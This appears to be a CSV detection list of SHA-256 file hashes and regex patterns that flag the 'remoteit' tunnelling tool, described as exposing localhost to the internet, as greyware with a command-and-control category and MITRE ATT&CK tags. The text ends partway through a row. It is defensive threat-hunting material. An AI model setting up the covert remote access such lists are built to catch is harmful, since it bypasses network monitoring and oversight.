"*0b8c64aa6263b5ad20087692b6f1d2ae26875a1f3015aa7c8bb1f401baa59ec7*",".{0,1000}0b8c64aa6263b5ad20087692b6f1d2ae26875a1f3015aa7c8bb1f401baa59ec7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0c197d94ca78db1fa029238f944f822c1b90b6f976c569cfd31eb438b16acba2*",".{0,1000}0c197d94ca78db1fa029238f944f822c1b90b6f976c569cfd31eb438b16acba2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0d7bafd96f7400a85372e15cfbb0e3d190701604903734e9546635720bbb56be*",".{0,1000}0d7bafd96f7400a85372e15cfbb0e3d190701604903734e9546635720bbb56be.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0dc1e16be2a13ae30176a34a2b31a93c3bfd49d1382477f096e3a91ba98826ba*",".{0,1000}0dc1e16be2a13ae30176a34a2b31a93c3bfd49d1382477f096e3a91ba98826ba.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0ed16e6b3d19d4e2c709a9fe09445939bc184499c020eebc07eee27becffb6d9*",".{0,1000}0ed16e6b3d19d4e2c709a9fe09445939bc184499c020eebc07eee27becffb6d9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*0f191947663cea1863ae366c895dead2e7a769acfd60bc22121a1d4866b821f9*",".{0,1000}0f191947663cea1863ae366c895dead2e7a769acfd60bc22121a1d4866b821f9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*0fbabd9468d07f89402193268bb3c1bfcc9c216f389e66cbc6eb75f3ef2a6dd9*",".{0,1000}0fbabd9468d07f89402193268bb3c1bfcc9c216f389e66cbc6eb75f3ef2a6dd9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1130109b30396301e05aba1303f6c5d27d6e35e033905469f45fb1102cab5c4f*",".{0,1000}1130109b30396301e05aba1303f6c5d27d6e35e033905469f45fb1102cab5c4f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*11a7c6e09cebb1a12cf18f43562ead367a7f527fbdea3a075422e48ecabd9e31*",".{0,1000}11a7c6e09cebb1a12cf18f43562ead367a7f527fbdea3a075422e48ecabd9e31.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*120fdd11d2b0a7c94663024af9b13e8c0b557f9c0e1efbc1cb85fa2122552c7c*",".{0,1000}120fdd11d2b0a7c94663024af9b13e8c0b557f9c0e1efbc1cb85fa2122552c7c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*125344e96627208ed84121e1d5244eb4f4b58b6606a51aa0c39282866da8cf5d*",".{0,1000}125344e96627208ed84121e1d5244eb4f4b58b6606a51aa0c39282866da8cf5d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1306f44ac242dd1382032f05a8f2ebf813cb71e0d8224e56455fbdb8cee02d81*",".{0,1000}1306f44ac242dd1382032f05a8f2ebf813cb71e0d8224e56455fbdb8cee02d81.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1320fcd96e4908f3c2ee0e86b30b5c6da22a755a29c3dd4392027b00e4ef66c7*",".{0,1000}1320fcd96e4908f3c2ee0e86b30b5c6da22a755a29c3dd4392027b00e4ef66c7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1359a52268613c5ffa6bef0a7030aad1cf409dba348b6b4fa3ab8d9a97d275ac*",".{0,1000}1359a52268613c5ffa6bef0a7030aad1cf409dba348b6b4fa3ab8d9a97d275ac.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*138277b4b2fb7da83f007207bec5df288dbc57ebff80d99c4a2d57eccc950bb9*",".{0,1000}138277b4b2fb7da83f007207bec5df288dbc57ebff80d99c4a2d57eccc950bb9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*1385144a41372d190eaf788b27372cc2bb258776722138c8ab3f1936e3bf051b*",".{0,1000}1385144a41372d190eaf788b27372cc2bb258776722138c8ab3f1936e3bf051b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*14b0160138b97e9183e570c542a566bcb68d815dc92761a9d31679a51626433f*",".{0,1000}14b0160138b97e9183e570c542a566bcb68d815dc92761a9d31679a51626433f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1643e037fc61ff8a14184176044145d17ce1ef2bbf9fc7c2e0d1679853d9ec74*",".{0,1000}1643e037fc61ff8a14184176044145d17ce1ef2bbf9fc7c2e0d1679853d9ec74.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1797c1fffe28c7234cc822eccdc773487499bd62c19bd999095d5eb11aa18b58*",".{0,1000}1797c1fffe28c7234cc822eccdc773487499bd62c19bd999095d5eb11aa18b58.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*184bc09abc6f6936a05c6ee49fdba98c5a289373ae70afdba2daa758d630593b*",".{0,1000}184bc09abc6f6936a05c6ee49fdba98c5a289373ae70afdba2daa758d630593b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*18a056d9fa89813c9e19f150cfab07ab374681ae253f4f7ce9953d4cad79bd2c*",".{0,1000}18a056d9fa89813c9e19f150cfab07ab374681ae253f4f7ce9953d4cad79bd2c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1c3116773feaf7723c98e6ec8c57dffadb45ed4dd6781133befb612fe40d5e96*",".{0,1000}1c3116773feaf7723c98e6ec8c57dffadb45ed4dd6781133befb612fe40d5e96.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1c6329a23d57e7b38b7ae061f609c4efcc75144cde1061ef3bcd2d2264b42dd9*",".{0,1000}1c6329a23d57e7b38b7ae061f609c4efcc75144cde1061ef3bcd2d2264b42dd9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1de7b243066345a7d95e5e61837e54cf91b687f5e064419d11ce6b48534d9a66*",".{0,1000}1de7b243066345a7d95e5e61837e54cf91b687f5e064419d11ce6b48534d9a66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*1e4339c6d4ebe8badb742b42ff9a336c9cbf4fca5d735dfdea67b7a9c598a297*",".{0,1000}1e4339c6d4ebe8badb742b42ff9a336c9cbf4fca5d735dfdea67b7a9c598a297.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1ede16af1fa680690f056d759d16a26bf527bd18d75cdd2d88c830b2a4afd980*",".{0,1000}1ede16af1fa680690f056d759d16a26bf527bd18d75cdd2d88c830b2a4afd980.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*1f0ebec30ded3a9df5a8e2195bbc891c339a092c8ac0f07233c8478c1182242f*",".{0,1000}1f0ebec30ded3a9df5a8e2195bbc891c339a092c8ac0f07233c8478c1182242f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*204eefc73b55ea27b172fcedba0c3ee0615548663fd095839ba2e153c8664e76*",".{0,1000}204eefc73b55ea27b172fcedba0c3ee0615548663fd095839ba2e153c8664e76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*205d67361d76c5f674393f0762515f32f005487d640751fb0cb67f81fa298ff4*",".{0,1000}205d67361d76c5f674393f0762515f32f005487d640751fb0cb67f81fa298ff4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*206d0059cc04cdb49bff03b5d3658749b511257cc235b2944dc74b82a0b31a2f*",".{0,1000}206d0059cc04cdb49bff03b5d3658749b511257cc235b2944dc74b82a0b31a2f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*20e6ac956f7f2b27eff59e66b04765a87cfdc9c1b2e30c5411a4a93b070813af*",".{0,1000}20e6ac956f7f2b27eff59e66b04765a87cfdc9c1b2e30c5411a4a93b070813af.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*214f97a55b8eb353dca363203a6616eed9a47d5f7faf21ff77664df8f9a4523d*",".{0,1000}214f97a55b8eb353dca363203a6616eed9a47d5f7faf21ff77664df8f9a4523d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*21af6d82b768b2311a249442c6777766b23a8d2f237a1905bdcf5457dea65182*",".{0,1000}21af6d82b768b2311a249442c6777766b23a8d2f237a1905bdcf5457dea65182.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*222ba94a96c4cd53262600b7d14dce0a100e870e042836ce421fcf8b8b89e01a*",".{0,1000}222ba94a96c4cd53262600b7d14dce0a100e870e042836ce421fcf8b8b89e01a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*22ad7d6222dbeb747db8b41dedb9c96ffe566e86e7cd4d5570ea010904d7b7c6*",".{0,1000}22ad7d6222dbeb747db8b41dedb9c96ffe566e86e7cd4d5570ea010904d7b7c6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*22cf3e75a11ac9d8b492e3c97ed730957372cca18f8d5e57f40d6357de006b35*",".{0,1000}22cf3e75a11ac9d8b492e3c97ed730957372cca18f8d5e57f40d6357de006b35.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*23fefd6e0803cb90fd71ab9011715c20916a5cddea1b07baac74a92e64106313*",".{0,1000}23fefd6e0803cb90fd71ab9011715c20916a5cddea1b07baac74a92e64106313.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*260e25a0cbe80d9ff05a9b1383bd0ac4f0d0fe0585c744ef1dc6c0e2dea45e06*",".{0,1000}260e25a0cbe80d9ff05a9b1383bd0ac4f0d0fe0585c744ef1dc6c0e2dea45e06.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*26cadd85587b74a8eaa26e6eae7724b60fc49b5ec448c41648168748404c4d13*",".{0,1000}26cadd85587b74a8eaa26e6eae7724b60fc49b5ec448c41648168748404c4d13.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*272873c13925ec870472484b99455d3e9dcbf82481b714a9fc05a7c1933137f2*",".{0,1000}272873c13925ec870472484b99455d3e9dcbf82481b714a9fc05a7c1933137f2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*2a349ec0870eaf921a1925be43539fb43de54a468bf0450965ce2170e8bc8afb*",".{0,1000}2a349ec0870eaf921a1925be43539fb43de54a468bf0450965ce2170e8bc8afb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*2bbe8dacf7d9ce6812dc88c629ef572ea7b7c507b240cfe299c2991a10fefbdf*",".{0,1000}2bbe8dacf7d9ce6812dc88c629ef572ea7b7c507b240cfe299c2991a10fefbdf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*3070edf334a7ecaf3259b124641526d1b9f56a4c67ff892e0948913cd57ffff2*",".{0,1000}3070edf334a7ecaf3259b124641526d1b9f56a4c67ff892e0948913cd57ffff2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*32aa4a7dcec317cef0a8e65e25a63c0c8e656745f72c49734ca7aedc8ec9a264*",".{0,1000}32aa4a7dcec317cef0a8e65e25a63c0c8e656745f72c49734ca7aedc8ec9a264.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*332436f5e6ee1c744ab5c658cc360e3d9f084e39ba583d8b2bcbf2e36f68a7fb*",".{0,1000}332436f5e6ee1c744ab5c658cc360e3d9f084e39ba583d8b2bcbf2e36f68a7fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*34286d2404219856835c624def995c2c71413456d9a9e7b8cb5affe8597f7dec*",".{0,1000}34286d2404219856835c624def995c2c71413456d9a9e7b8cb5affe8597f7dec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3448383224c7ac46a72a5717633490909333d1a50a29dbfc4434ff90e16d6b33*",".{0,1000}3448383224c7ac46a72a5717633490909333d1a50a29dbfc4434ff90e16d6b33.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*356dd15f05b37e62f334000101f95094b81c0c473cba0e8c033bec5f9f2b84eb*",".{0,1000}356dd15f05b37e62f334000101f95094b81c0c473cba0e8c033bec5f9f2b84eb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*36e59507a58d54c025b62c0ef2699382e6ca9211062540ee263544bf54854768*",".{0,1000}36e59507a58d54c025b62c0ef2699382e6ca9211062540ee263544bf54854768.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3a0743b046340770a16cdddacc4bfef4e2f07e0062669d07589f0d62af1a2702*",".{0,1000}3a0743b046340770a16cdddacc4bfef4e2f07e0062669d07589f0d62af1a2702.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3a3788e15d2cde3cc0b07bcae1b38a52f756e004cc7426bb45d275d28b7989da*",".{0,1000}3a3788e15d2cde3cc0b07bcae1b38a52f756e004cc7426bb45d275d28b7989da.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*3a828c63459e09fa4b7fd6020d9e35df05d7e03ad9214f6a321f6788089c6a1f*",".{0,1000}3a828c63459e09fa4b7fd6020d9e35df05d7e03ad9214f6a321f6788089c6a1f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3c10eb3a8cb98f387491c7e8e28c1e7a0e885c74139c9df60043a9ad6d9593fe*",".{0,1000}3c10eb3a8cb98f387491c7e8e28c1e7a0e885c74139c9df60043a9ad6d9593fe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3dcf212a13eccca01b047a9becb99480bfbb9d0ad9b095407ca9b3546c429274*",".{0,1000}3dcf212a13eccca01b047a9becb99480bfbb9d0ad9b095407ca9b3546c429274.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3e3a7b98aa6f420061710d64c9bda2aac9040304d2952f46661696d16aed402f*",".{0,1000}3e3a7b98aa6f420061710d64c9bda2aac9040304d2952f46661696d16aed402f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3ea27a3727d42fba0e3862628a13fe6458bae277d5f477d1fce626e90e12e569*",".{0,1000}3ea27a3727d42fba0e3862628a13fe6458bae277d5f477d1fce626e90e12e569.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*3f34a1d2be46289a7f93e67e605d1d3b45001e2d14d78407da986f3d6d0a7075*",".{0,1000}3f34a1d2be46289a7f93e67e605d1d3b45001e2d14d78407da986f3d6d0a7075.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*400e477ebf627aa5ba9c11ef2cf9cb2bd4acc53a6beca20148f141f6f3c504da*",".{0,1000}400e477ebf627aa5ba9c11ef2cf9cb2bd4acc53a6beca20148f141f6f3c504da.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*41b357d80dd91685737274a7c03aaabf90d9d67245f84fd1af5eff5dc56fa330*",".{0,1000}41b357d80dd91685737274a7c03aaabf90d9d67245f84fd1af5eff5dc56fa330.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*41d31ce4d0e4133c1121a02d2d7121bff87c1a8ebc560181517bc72bde3e8fe5*",".{0,1000}41d31ce4d0e4133c1121a02d2d7121bff87c1a8ebc560181517bc72bde3e8fe5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*4371963ea620ef5dd65176c19997b8067d5d7f72dd722a63f982b5de6659d45c*",".{0,1000}4371963ea620ef5dd65176c19997b8067d5d7f72dd722a63f982b5de6659d45c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*43fc6c375a8f2e40c144d4b47c6d807dcb9aa4dc58fff62761beab1b13c62015*",".{0,1000}43fc6c375a8f2e40c144d4b47c6d807dcb9aa4dc58fff62761beab1b13c62015.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*44a2461a051dde2487b73014e314cd29b2a8f5587d88b99d13a495c5071923b8*",".{0,1000}44a2461a051dde2487b73014e314cd29b2a8f5587d88b99d13a495c5071923b8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*453388653c7d68a5478c82f71496229ec9f9fbafbff2ffc4a3817f392d23fcdd*",".{0,1000}453388653c7d68a5478c82f71496229ec9f9fbafbff2ffc4a3817f392d23fcdd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*4570d2de6fa24427fe99f395693a798d918c58a67fe5be87317e58548605f27d*",".{0,1000}4570d2de6fa24427fe99f395693a798d918c58a67fe5be87317e58548605f27d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
